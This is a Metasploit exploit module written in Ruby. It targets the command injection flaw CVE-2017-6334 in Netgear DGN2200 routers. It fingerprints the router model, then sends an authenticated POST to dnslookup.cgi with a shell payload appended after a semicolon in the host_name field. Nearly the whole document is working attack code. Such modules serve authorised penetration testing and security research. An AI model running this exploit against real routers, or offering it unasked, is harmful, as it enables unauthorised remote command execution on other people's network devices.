Netgear DGN2200 dnslookup.cgi Command Injection

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'net/http'  
require "base64"  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => "Netgear DGN2200 dnslookup.cgi Command Injection",  
'Description' => %q{  
This module exploits a command injection vulnerablity in NETGEAR  
DGN2200v1/v2/v3/v4 routers by sending a specially crafted post request  
with valid login details.  
},  
'License' => MSF_LICENSE,  
'Platform' => 'unix',  
'Author' => [  
'thecarterb', # Metasploit Module  
'SivertPL' # Vuln discovery  
],  
'DefaultTarget' => 0,  
'Privileged' => true,  
'Arch' => [ARCH_CMD],  
'Targets' => [  
[ 'NETGEAR DDGN2200 Router', { } ]  
],  
'References' =>  
[  
[ 'EDB', '41459'],  
[ 'CVE', '2017-6334']  
],  
'DisclosureDate' => 'Feb 25 2017',  
))  
  
register_options(  
[  
Opt::RPORT(80),  
OptString.new('USERNAME', [true, 'Username to authenticate with', '']),  
OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])  
])  
  
register_advanced_options(  
[  
OptString.new('HOSTNAME', [true, '"Hostname" to look up (doesn\'t really do anything important)', 'www.google.com'])  
])  
end  
  
# Requests the login page which tells us the hardware version  
def check  
res = send_request_cgi({'uri'=>'/'})  
if res.nil?  
fail_with(Failure::Unreachable, 'Connection timed out.')  
end  
# Checks for the `WWW-Authenticate` header in the response  
if res.headers["WWW-Authenticate"]  
data = res.to_s  
marker_one = "Basic realm=\"NETGEAR "  
marker_two = "\""  
model = data[/#{marker_one}(.*?)#{marker_two}/m, 1]  
vprint_status("Router is a NETGEAR router (#{model})")  
model_numbers = ['DGN2200v1', 'DGN2200v2', 'DGN2200v3', 'DGN2200v4']  
if model_numbers.include?(model)  
print_good("Router may be vulnerable (NETGEAR #{model})")  
return CheckCode::Detected  
else  
return CheckCode::Safe  
end  
else  
print_error('Router is not a NETGEAR router')  
return CheckCode::Safe  
end  
end  
  
def exploit  
check  
  
# Convert datastores  
user = datastore['USERNAME']  
pass = datastore['PASSWORD']  
hostname = datastore['HOSTNAME']  
  
vprint_status("Using encoder: #{payload.encoder} ")  
print_status('Sending payload...')  
  
vprint_status("Attempting to authenticate with: #{user}:#{pass} (b64 encoded for auth)")  
  
creds_combined = Base64.strict_encode64("#{user}:#{pass}")  
vprint_status("Encoded authentication: #{creds_combined}")  
  
res = send_request_cgi({  
'uri' => '/dnslookup.cgi',  
'headers' => {  
'Authorization' => "Basic #{creds_combined}"  
},  
'vars_post' => {  
'lookup' => 'Lookup',  
'host_name' => hostname + '; ' + payload.encoded  
}})  
  
end  
end  
`